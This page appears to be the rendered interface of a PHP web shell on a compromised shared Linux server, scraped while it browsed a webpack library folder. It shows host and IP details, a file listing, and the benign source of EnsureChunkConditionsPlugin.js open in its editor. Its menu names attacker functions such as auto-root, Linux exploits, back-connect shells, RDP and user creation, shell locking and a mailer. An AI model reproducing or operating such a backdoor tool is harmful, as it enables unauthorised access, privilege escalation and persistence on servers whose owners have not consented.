Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
webpack /
lib /
optimize /
[ HOME SHELL ]
Name
Size
Permission
Action
AggressiveMergingPlugin.js
2.02
KB
-rw-r--r--
AggressiveSplittingPlugin.js
9.14
KB
-rw-r--r--
ChunkModuleIdRangePlugin.js
1.55
KB
-rw-r--r--
ConcatenatedModule.js
36.82
KB
-rw-r--r--
EnsureChunkConditionsPlugin.js
2.01
KB
-rw-r--r--
FlagIncludedChunksPlugin.js
3.14
KB
-rw-r--r--
LimitChunkCountPlugin.js
7.42
KB
-rw-r--r--
MergeDuplicateChunksPlugin.js
2.43
KB
-rw-r--r--
MinChunkSizePlugin.js
2.53
KB
-rw-r--r--
MinMaxSizeWarning.js
819
B
-rw-r--r--
ModuleConcatenationPlugin.js
14.49
KB
-rw-r--r--
NaturalChunkOrderPlugin.js
1.1
KB
-rw-r--r--
OccurrenceChunkOrderPlugin.js
2.01
KB
-rw-r--r--
OccurrenceModuleOrderPlugin.js
3.27
KB
-rw-r--r--
OccurrenceOrderPlugin.js
3.9
KB
-rw-r--r--
RemoveEmptyChunksPlugin.js
990
B
-rw-r--r--
RemoveParentModulesPlugin.js
3.61
KB
-rw-r--r--
RuntimeChunkPlugin.js
1.04
KB
-rw-r--r--
SideEffectsFlagPlugin.js
5.14
KB
-rw-r--r--
SplitChunksPlugin.js
28.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EnsureChunkConditionsPlugin.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const GraphHelpers = require("../GraphHelpers"); class EnsureChunkConditionsPlugin { apply(compiler) { compiler.hooks.compilation.tap( "EnsureChunkConditionsPlugin", compilation => { const handler = chunks => { let changed = false; for (const module of compilation.modules) { if (!module.chunkCondition) continue; const sourceChunks = new Set(); const chunkGroups = new Set(); for (const chunk of module.chunksIterable) { if (!module.chunkCondition(chunk)) { sourceChunks.add(chunk); for (const group of chunk.groupsIterable) { chunkGroups.add(group); } } } if (sourceChunks.size === 0) continue; const targetChunks = new Set(); chunkGroupLoop: for (const chunkGroup of chunkGroups) { // Can module be placed in a chunk of this group? for (const chunk of chunkGroup.chunks) { if (module.chunkCondition(chunk)) { targetChunks.add(chunk); continue chunkGroupLoop; } } // We reached the entrypoint: fail if (chunkGroup.isInitial()) { throw new Error( "Cannot fullfil chunk condition of " + module.identifier() ); } // Try placing in all parents for (const group of chunkGroup.parentsIterable) { chunkGroups.add(group); } } for (const sourceChunk of sourceChunks) { GraphHelpers.disconnectChunkAndModule(sourceChunk, module); } for (const targetChunk of targetChunks) { GraphHelpers.connectChunkAndModule(targetChunk, module); } } if (changed) return true; }; compilation.hooks.optimizeChunksBasic.tap( "EnsureChunkConditionsPlugin", handler ); compilation.hooks.optimizeExtractedChunksBasic.tap( "EnsureChunkConditionsPlugin", handler ); } ); } } module.exports = EnsureChunkConditionsPlugin;
Close